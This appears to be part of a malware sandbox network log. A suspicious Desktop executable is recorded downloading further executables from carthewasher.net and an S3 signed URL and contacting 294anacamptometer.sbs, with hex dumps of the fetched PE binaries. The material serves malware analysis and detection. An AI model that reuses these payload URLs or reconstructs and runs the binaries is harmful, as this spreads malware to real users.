2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 7d 08 85 ff 0f 84 83 00 00 00 80 3f 00 74 7e 8b 75 0c 85 f6 74 77 ff 75 10 8d 4d f0 e8 4e ff ff ff 8d 45 f0 50 0f b6 07 50 e8 53 2a 00 00 59 85 c0 8b 45 f0 59 74 2a 83 78 74 01 7e 3c 3b 70 74 7c 37 6a 00 6a 00 ff 70 74 57 6a 09 ff 70 04 ff 15 ac 00 41 00 85 c0 74 20 8b 45 f0 8b 70 74 eb 1b 6a 00 6a 00 33 f6 46 56 57 6a 09 ff 70 04 ff 15 ac 00 41 00 85 c0 75 03 83 ce ff 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd 8b c6 eb 02 33 c0 5f 5e 8b e5 5d c3 55 8b ec 83 3d 9c dd 81 00 00 75 07 68 90 78 41 00 eb 02 6a 00 ff 75 0c ff 75 08 e8 42 ff ff ff 83 c4 0c 5d c3 cc cc cc cc cc cc cc cc cc cc 57 8b 7c 24 08 eb 6e 8d a4 24 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00 00 00 74 13 8a 01 83 c1 01 84 c0 74 3d f7 c1 03 00 00 00 75 ef 8b ff 8b 01 ba ff fe fe 7e 03 d0 83 f0 Data Ascii: }?t~utwuMNEPPSYEYtxt~<;pt\|7jjptWjpAt Eptjj3FVWjpAu}tMap3_^]U=uhxAjuuB]W\|$n$L$Wtt=u~
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 3d 00 00 c7 00 2a 00 00 00 eb 25 33 ff eb 1b 8d 4d f0 0f b6 c0 51 50 e8 0c 25 00 00 59 59 85 c0 74 06 46 80 3e 00 74 08 47 46 8a 06 84 c0 75 df 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd 8b c7 5f 5e 8b e5 5d c3 55 8b ec b8 28 10 00 00 e8 69 42 00 00 a1 10 7f 41 00 33 c5 89 45 fc 57 8b 7d 08 89 bd ec ef ff ff 85 ff 75 18 e8 96 3c 00 00 c7 00 16 00 00 00 e8 f8 3e 00 00 83 c8 ff e9 44 03 00 00 53 56 57 e8 3d 28 00 00 33 db 8b f0 59 89 b5 e8 ef ff ff 39 5f 04 7d 03 89 5f 04 6a 01 53 56 e8 07 3f 00 00 83 c4 0c 89 85 f4 ef ff ff 85 c0 0f 88 ac 02 00 00 8b c6 8b ce c1 f8 05 83 e1 1f c1 e1 06 89 85 f0 ef ff ff 89 8d e0 ef ff ff 8b 14 85 38 df 81 00 8b 47 0c 89 85 dc ef ff ff 8a 54 11 24 02 d2 d0 fa a9 08 01 00 00 8b 85 f4 ef ff ff 88 95 fb ef ff ff 75 08 2b 47 04 e9 Data Ascii: =*%3MQP%YYtF>tGFu}tMap_^]U(iBA3EW}u<>DSVW=(3Y9_}_jSV?8GT$u+G
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 06 03 14 85 38 df 81 00 eb 05 ba d0 7e 41 00 f6 42 24 80 75 81 e8 12 24 00 00 83 c0 20 50 6a 01 e8 4c 24 00 00 59 59 83 65 fc 00 e8 fc 23 00 00 83 c0 20 50 e8 e1 42 00 00 89 45 e0 ff 75 08 e8 ee f3 ff ff 8b f0 e8 e1 23 00 00 83 c0 20 50 56 6a 01 ff 75 08 e8 36 41 00 00 83 c4 18 3b c6 75 32 e8 c6 23 00 00 ff 48 24 78 11 e8 bc 23 00 00 8d 48 20 8b 01 c6 00 0a ff 01 eb 12 e8 ab 23 00 00 83 c0 20 50 6a 0a e8 b5 3f 00 00 59 59 33 ff 89 7d e4 e8 94 23 00 00 83 c0 20 50 ff 75 e0 e8 45 42 00 00 59 59 c7 45 fc fe ff ff ff e8 08 00 00 00 e9 ef fe ff ff 8b 7d e4 e8 6d 23 00 00 83 c0 20 50 6a 01 e8 11 24 00 00 59 59 c3 55 8b ec 56 8b 75 08 8b 46 0c a8 83 75 10 e8 cc 36 00 00 c7 00 16 00 00 00 83 c8 ff eb 6e 53 8b 5d 10 83 e0 ef 89 46 0c 57 83 fb 01 75 10 56 e8 eb f9 Data Ascii: 8~AB$u$ PjL$YYe# PBEu# PVju6A;u2#H$x#H # Pj?YY3}# PuEBYYE}m# Pj$YYUVuFu6nS]FWuV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49766	104.21.82.182	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:14:59 UTC	285	OUT	GET /0a9ab821666277b5dd3929d09bffe743/cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: carthewasher.net Connection: Keep-Alive
2024-03-28 08:15:00 UTC	671	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:15:00 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4371848 Connection: close Last-Modified: Thu, 28 Mar 2024 07:43:46 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3M3NXXLLxp3YETHY%2BPT9J972BO3Ykzg8M%2B2DqFaB5dOD5oZle8GtbWchkGBk71fupg85IGnwJjjyZHbPa2P5KATlTRbkWE5OD3Q1rj3t%2BmM9TQUNfyKzNIj0BJV2gO6ejmHZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62b78f87b59a4-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:15:00 UTC	698	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fe fc 51 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQd
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 00 41 00 56 8d 85 80 fa ff ff 50 ff 15 24 00 41 00 56 56 e8 36 1b 00 00 56 56 e8 ad 1f 00 00 56 e8 6b 1f 00 00 f3 0f 10 05 ec 55 41 00 83 c4 14 0f 5a c0 56 51 51 f2 0f 11 04 24 e8 71 17 00 00 56 dd d8 e8 48 1f 00 00 83 c4 10 e8 3b 24 00 00 a1 98 bf 41 00 81 c1 4b 13 01 00 51 56 a3 28 34 ec 00 89 0d 24 33 ec 00 ff 15 28 00 41 00 8d 4d dc a3 7c 32 ec 00 51 6a 40 ff 35 24 33 ec 00 50 ff 15 84 00 41 00 bf 6e 15 29 00 56 8d 85 80 ea ff ff 50 ff 15 90 01 41 00 4f 75 ef 8b 0d 24 33 ec 00 8b fe 85 c9 74 78 a1 28 34 ec 00 8a 8c 38 4b 13 01 00 a1 7c 32 ec 00 88 0c 38 8b 0d 24 33 ec 00 81 f9 90 04 00 00 75 51 8d 85 80 fe ff ff 50 ff 15 3c 00 41 00 8d 45 f0 50 56 8d 45 94 50 56 ff 15 60 00 41 00 56 ff 15 68 00 41 00 56 8d 85 80 fa ff ff 50 8d 45 e4 50 8d 45 ec 50 8d Data Ascii: AVP$AVV6VVVkUAZVQQ$qVH;$AKQV(4$3(AM\|2Qj@5$3PAn)VPAOu$3tx(48K\|28$3uQP<AEPVEPV`AVhAVPEPEP
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 00 00 00 8b c6 5e 5d c2 04 00 55 8b ec 8b 45 0c 53 8b 5d 08 56 57 8b f1 8b 7b 10 3b f8 72 74 2b f8 39 7d 10 0f 42 7d 10 3b f3 75 17 03 c7 50 e8 27 01 00 00 8b 45 0c 8b ce 50 6a 00 e8 49 01 00 00 eb 47 6a 00 57 e8 c1 01 00 00 84 c0 74 3b 83 7b 14 10 72 02 8b 1b 83 7e 14 10 72 04 8b 0e eb 02 8b ce 85 ff 74 10 8b 45 0c 57 03 c3 50 51 e8 50 05 00 00 83 c4 0c 83 7e 14 10 89 7e 10 72 04 8b 06 eb 02 8b c6 c6 04 38 00 5f 8b c6 5e 5b 5d c2 0c 00 68 d4 55 41 00 e8 f5 04 00 00 cc 55 8b ec 80 7d 08 00 56 57 8b 7d 0c 8b f1 74 20 83 7e 14 10 72 1a 53 8b 1e 85 ff 74 0b 57 53 56 e8 01 05 00 00 83 c4 0c 53 e8 a2 19 00 00 59 5b 89 7e 10 c7 46 14 0f 00 00 00 c6 04 37 00 5f 5e 5d c2 08 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7d 01 00 00 84 c0 74 1c 83 7e 14 10 72 04 8b 06 eb Data Ascii: ^]UES]VW{;rt+9}B};uP'EPjIGjWt;{r~rtEWPQP~~r8_^[]hUAU}VW}t ~rStWSVSY[~F7_^]US]VS}t~r
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: f4 0f 41 00 50 e8 c7 1e 00 00 cc 55 8b ec 83 ec 0c 8b 45 08 8d 4d f4 89 45 08 8d 45 08 50 e8 b8 23 00 00 68 68 5b 41 00 8d 45 f4 c7 45 f4 1c 10 41 00 50 e8 99 1e 00 00 cc 55 8b ec 83 ec 0c 8b 45 08 8d 4d f4 89 45 08 8d 45 08 50 e8 8a 23 00 00 68 a4 5b 41 00 8d 45 f4 c7 45 f4 28 10 41 00 50 e8 6b 1e 00 00 cc cc cc cc cc 57 56 8b 74 24 10 8b 4c 24 14 8b 7c 24 0c 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 68 03 00 00 0f ba 25 7c dd 81 00 01 73 07 f3 a4 e9 17 03 00 00 81 f9 80 00 00 00 0f 82 ce 01 00 00 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 08 70 41 00 01 0f 82 da 04 00 00 0f ba 25 7c dd 81 00 00 0f 83 a7 01 00 00 f7 c7 03 00 00 00 0f 85 b8 01 00 00 f7 c6 03 00 00 00 0f 85 97 01 00 00 0f ba e7 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f ba e7 03 73 Data Ascii: APUEMEEP#hh[AEEAPUEMEEP#h[AEE(APkWVt$L$\|$;v;h%\|s3u%pA%\|svs
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 03 88 47 03 8b 44 24 0c 5e 5f c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 ea 07 74 65 8d a4 24 00 00 00 00 90 66 0f 6f 06 66 0f 6f 4e 10 66 0f 6f 56 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57 20 66 0f 7f 5f 30 66 0f 6f 66 40 66 0f 6f 6e 50 66 0f 6f 76 60 66 0f 6f 7e 70 66 0f 7f 67 40 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8 83 Data Ascii: GD$^_IFGFGD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tvIu
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 54 2a 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 54 2a 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 54 2a 40 00 8d 49 00 08 2a 40 00 10 2a 40 00 18 2a 40 00 20 2a 40 00 28 2a 40 00 30 2a 40 00 38 2a 40 00 4b 2a 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 54 2a 40 00 8b ff 64 2a 40 00 6c 2a 40 00 7c 2a 40 00 90 2a 40 00 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8b 44 24 0c Data Ascii: r$T@IF#GFGr$T@F#GFGFGV$T@I@@@ @(@0@8@K@DDDDDDDDDDDDDD$T@d@l@\|@@D$^_FGD$
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 0f 84 83 00 00 00 80 3f 00 74 7e 8b 75 0c 85 f6 74 77 ff 75 10 8d 4d f0 e8 4e ff ff ff 8d 45 f0 50 0f b6 07 50 e8 53 2a 00 00 59 85 c0 8b 45 f0 59 74 2a 83 78 74 01 7e 3c 3b 70 74 7c 37 6a 00 6a 00 ff 70 74 57 6a 09 ff 70 04 ff 15 ac 00 41 00 85 c0 74 20 8b 45 f0 8b 70 74 eb 1b 6a 00 6a 00 33 f6 46 56 57 6a 09 ff 70 04 ff 15 ac 00 41 00 85 c0 75 03 83 ce ff 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd 8b c6 eb 02 33 c0 5f 5e 8b e5 5d c3 55 8b ec 83 3d 9c dd 81 00 00 75 07 68 90 78 41 00 eb 02 6a 00 ff 75 0c ff 75 08 e8 42 ff ff ff 83 c4 0c 5d c3 cc cc cc cc cc cc cc cc cc cc 57 8b 7c 24 08 eb 6e 8d a4 24 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00 00 00 74 13 8a 01 83 c1 01 84 c0 74 3d f7 c1 03 00 00 00 75 ef 8b ff 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 Data Ascii: ?t~utwuMNEPPSYEYtxt~<;pt\|7jjptWjpAt Eptjj3FVWjpAu}tMap3_^]U=uhxAjuuB]W\|$n$L$Wtt=u~3
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 00 2a 00 00 00 eb 25 33 ff eb 1b 8d 4d f0 0f b6 c0 51 50 e8 0c 25 00 00 59 59 85 c0 74 06 46 80 3e 00 74 08 47 46 8a 06 84 c0 75 df 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd 8b c7 5f 5e 8b e5 5d c3 55 8b ec b8 28 10 00 00 e8 69 42 00 00 a1 10 7f 41 00 33 c5 89 45 fc 57 8b 7d 08 89 bd ec ef ff ff 85 ff 75 18 e8 96 3c 00 00 c7 00 16 00 00 00 e8 f8 3e 00 00 83 c8 ff e9 44 03 00 00 53 56 57 e8 3d 28 00 00 33 db 8b f0 59 89 b5 e8 ef ff ff 39 5f 04 7d 03 89 5f 04 6a 01 53 56 e8 07 3f 00 00 83 c4 0c 89 85 f4 ef ff ff 85 c0 0f 88 ac 02 00 00 8b c6 8b ce c1 f8 05 83 e1 1f c1 e1 06 89 85 f0 ef ff ff 89 8d e0 ef ff ff 8b 14 85 38 df 81 00 8b 47 0c 89 85 dc ef ff ff 8a 54 11 24 02 d2 d0 fa a9 08 01 00 00 8b 85 f4 ef ff ff 88 95 fb ef ff ff 75 08 2b 47 04 e9 c1 02 00 00 Data Ascii: *%3MQP%YYtF>tGFu}tMap_^]U(iBA3EW}u<>DSVW=(3Y9_}_jSV?8GT$u+G
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 38 df 81 00 eb 05 ba d0 7e 41 00 f6 42 24 80 75 81 e8 12 24 00 00 83 c0 20 50 6a 01 e8 4c 24 00 00 59 59 83 65 fc 00 e8 fc 23 00 00 83 c0 20 50 e8 e1 42 00 00 89 45 e0 ff 75 08 e8 ee f3 ff ff 8b f0 e8 e1 23 00 00 83 c0 20 50 56 6a 01 ff 75 08 e8 36 41 00 00 83 c4 18 3b c6 75 32 e8 c6 23 00 00 ff 48 24 78 11 e8 bc 23 00 00 8d 48 20 8b 01 c6 00 0a ff 01 eb 12 e8 ab 23 00 00 83 c0 20 50 6a 0a e8 b5 3f 00 00 59 59 33 ff 89 7d e4 e8 94 23 00 00 83 c0 20 50 ff 75 e0 e8 45 42 00 00 59 59 c7 45 fc fe ff ff ff e8 08 00 00 00 e9 ef fe ff ff 8b 7d e4 e8 6d 23 00 00 83 c0 20 50 6a 01 e8 11 24 00 00 59 59 c3 55 8b ec 56 8b 75 08 8b 46 0c a8 83 75 10 e8 cc 36 00 00 c7 00 16 00 00 00 83 c8 ff eb 6e 53 8b 5d 10 83 e0 ef 89 46 0c 57 83 fb 01 75 10 56 e8 eb f9 ff ff 8b 7d Data Ascii: 8~AB$u$ PjL$YYe# PBEu# PVju6A;u2#H$x#H # Pj?YY3}# PuEBYYE}m# Pj$YYUVuFu6nS]FWuV}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49772	104.21.42.248	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:00 UTC	479	OUT	GET /bjhgvfd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: 294anacamptometer.sbs Connection: Keep-Alive Cookie: _subid=2os9o961spv0l; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTE2MTM2OTl9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzExNjEzNjk5fSxcInRpbWVcIjoxNzExNjEzNjk5fSJ9.KHqIfUeldGCGZRbbj7rLIdUk1MeFJ0AXBEcAv6r9p8Q
2024-03-28 08:15:00 UTC	702	IN	HTTP/1.1 404 Not Found Date: Thu, 28 Mar 2024 08:15:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Expires: Thu, 28 Mar 2024 08:15:00 GMT Set-Cookie: _subid=2os9o961spv0m; expires=Sun, 28 Apr 2024 08:15:00 GMT; path=/ Set-Cookie: 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTE2MTM2OTl9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzExNjEzNjk5fSxcInRpbWVcIjoxNzExNjEzNjk5fSJ9.KHqIfUeldGCGZRbbj7rLIdUk1MeFJ0AXBEcAv6r9p8Q; expires=Fri, 24 Jun 2078 16:30:00 GMT; path=/ Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 86b62b7a4ee13af9-IAD
2024-03-28 08:15:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49769	52.216.219.33	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:00 UTC	1375	OUT	GET /e14c6eb6-712a-4c2e-be84-37a1de2550e3/downloads/ddaff67e-23e9-45d6-b114-ae41de265d36/Start.exe?response-content-disposition=attachment%3B%20filename%3D%22Start.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAB3POAY3&Signature=3kDIIlaGVwgd2Exw7Puex%2FlGpQo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjELn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQDhHqaiQO5ftJoYENXqYI3qOUsxKtJmtL5TyDU8XRCQpgIhALTEr1oPjk5GlozLK44TJQxo2B9PWb3F8vt9A66nptTFKrACCNH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzjabjAh4jtdqFTXO8qhAKc%2FJCUi8r7C2rKpJ6nTOBKVhhNuTfp0qyzeYXq3z5zb1SOBopYqoPnADE6EcT5B63SdEanUmptHSjNoRDCfbaJATgqQMr2zoj8W7o%2BLo3H4Zg7DvK%2Fh3CfkFJIe3eIDeK5ugIsMz3MnRS9bNVX%2BcnAmrcAh%2BLT0z9IvvAxRjvFzYyLF%2FjD3GZJp1E2ykbjBzBreBe4mJ8QG%2FpJRnNX%2FzBOVs16I6JWDVjjNvkEjrr88qyKsqOC%2Bkq0Zql9hqo2bUEqWZB5IYTIBgns0vp2SnzyrfrU4EYav2Ocri113OUEwF%2BuqrzzIbJVlFlU%2BDZaiZ3JnC%2F8fsZb26UgILl75oPvRz55yTDWypSwBjqcAUsNXCnm%2F1yH8Tt9PM2FrdznncEhI8VB3%2FUWYkOw78tlqOIqDRNWTLh1OCJMAeCnMcCqejljL%2FrkTEa%2BDm%2Bbl4DnM9S%2BFv1NUD3keKurkqOpub1OaR34rpEANOAiBrWsHoegfz6J2mZQrWsZPo%2FVAtv9i0X472Wr4oV5dwAK6OvyCX4xw8dKzr2mFblnik%2FDvWIBi5kNW73qgBolRA%3D%3D&Expires=1711615070 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
2024-03-28 08:15:00 UTC	538	IN	HTTP/1.1 200 OK x-amz-id-2: mbdqo1Qua/RZOl6GYHuuCOHYdS4YjUt+kJ3gJo3u04qOsrSPwuK/p6xUhJVScmMwNSuW2fPbEDQ= x-amz-request-id: JX2D7Q6TDRN1VWQ6 Date: Thu, 28 Mar 2024 08:15:01 GMT Last-Modified: Tue, 26 Mar 2024 22:54:37 GMT ETag: "1163dfdb973a2054dc853ba3723e0363" x-amz-server-side-encryption: AES256 x-amz-version-id: GTEGo2LUzv7IAJYElopp8jLTTqh.NYl5 Content-Disposition: attachment; filename="Start.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Server: AmazonS3 Content-Length: 278664 Connection: close
2024-03-28 08:15:00 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cc 49 03 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 e8 03 00 00 08 00 00 00 00 00 00 0e 06 04 00 00 20 00 00 00 20 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 04 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELIf @ ``
2024-03-28 08:15:00 UTC	486	IN	Data Raw: 00 00 fe 0c 01 00 45 07 00 00 00 7a 00 00 00 86 00 00 00 a5 00 00 00 b4 00 00 00 6a 00 00 00 3c 00 00 00 05 00 00 00 38 75 00 00 00 12 00 7e c0 00 00 04 28 10 01 00 06 7e c1 00 00 04 28 fe 00 00 06 1f 0e 3c 58 00 00 00 20 01 00 00 00 28 00 01 00 06 39 ae ff ff ff 26 20 00 00 00 00 38 a3 ff ff ff 7e be 00 00 04 28 fc 00 00 06 20 e8 07 00 00 1f 03 1f 1b 73 0f 00 00 0a 7e bf 00 00 04 28 fd 00 00 06 13 00 20 06 00 00 00 38 75 ff ff ff 17 80 3c 00 00 04 20 05 00 00 00 38 65 ff ff ff 72 01 00 00 70 73 10 00 00 0a 7a 2a 38 fa ff ff ff 20 00 00 00 00 28 00 01 00 06 3a 45 ff ff ff 26 20 00 00 00 00 38 3a ff ff ff 38 db ff ff ff 20 04 00 00 00 38 2b ff ff ff 7e 3c 00 00 04 39 ac ff ff ff 20 02 00 00 00 fe 0e 01 00 38 0f ff ff ff 00 1e 02 28 18 00 00 0a 2a 2e 00 fe Data Ascii: Ezj<8u~(~(<X (9& 8~( s~( 8u< 8erpsz8 (:E& 8:8 8+~<9 8(.
2024-03-28 08:15:00 UTC	16384	IN	Data Raw: 00 6b 10 00 00 9f 0f 00 00 71 07 00 00 82 0d 00 00 5a 12 00 00 71 0a 00 00 90 04 00 00 6b 01 00 00 45 01 00 00 a7 0d 00 00 1a 11 00 00 c4 05 00 00 26 07 00 00 bb 07 00 00 f0 05 00 00 ac 0a 00 00 1f 0c 00 00 96 07 00 00 2b 06 00 00 a1 13 00 00 ec 01 00 00 32 09 00 00 e1 09 00 00 61 0d 00 00 73 0b 00 00 f5 10 00 00 c5 02 00 00 57 09 00 00 00 07 00 00 c5 0f 00 00 56 06 00 00 80 0c 00 00 0a 04 00 00 ea 02 00 00 0f 14 00 00 d6 0a 00 00 c0 10 00 00 11 0d 00 00 eb 12 00 00 5b 08 00 00 b7 08 00 00 35 04 00 00 5a 04 00 00 dd 0d 00 00 25 01 00 00 8e 0e 00 00 30 00 00 00 ab 06 00 00 b0 04 00 00 69 0e 00 00 f6 07 00 00 45 10 00 00 f0 00 00 00 ea 13 00 00 50 11 00 00 7c 13 00 00 3e 05 00 00 47 13 00 00 49 03 00 00 b6 01 00 00 eb 04 00 00 90 01 00 00 74 03 00 00 0a 12 Data Ascii: kqZqkE&+2asWV[5Z%0iEP\|>GIt
2024-03-28 08:15:00 UTC	1024	IN	Data Raw: 48 00 e3 00 24 00 ba 1d 5d 02 b1 02 45 10 d1 07 81 01 53 1e b2 07 49 02 9f 1e d7 07 b1 01 7e 11 4e 04 b1 01 65 1f 51 02 d1 00 0c 34 af 0a d1 00 14 34 b4 0a c9 00 23 34 51 02 c1 02 31 34 bd 0a 49 02 dc 14 c2 0a e1 00 36 34 c7 0a 21 02 b4 19 ce 0a 21 02 80 1b d4 0a 19 00 66 15 bf 07 19 00 3f 34 c5 05 f1 01 47 34 d9 0a 39 01 57 12 e0 0a f1 01 30 19 e7 0a 51 01 53 34 08 05 c9 02 48 00 e3 00 d1 02 48 00 fc 0a e1 02 48 00 e3 00 f1 02 48 00 e3 00 27 00 ab 04 ee 0a 2e 00 5b 00 79 01 2e 00 53 00 4f 01 2e 00 4b 00 a1 00 2e 00 63 00 a1 00 2e 00 0b 00 a1 00 2e 00 73 00 94 01 2e 00 6b 00 87 01 2e 00 23 00 c4 00 2e 00 1b 00 b5 00 2e 00 13 00 a1 00 2e 00 2b 00 e7 00 2e 00 43 00 a1 00 2e 00 3b 00 39 01 2e 00 33 00 ff 00 a3 00 b3 04 f3 0a c3 00 b3 04 f3 0a e3 00 b3 04 f3 Data Ascii: 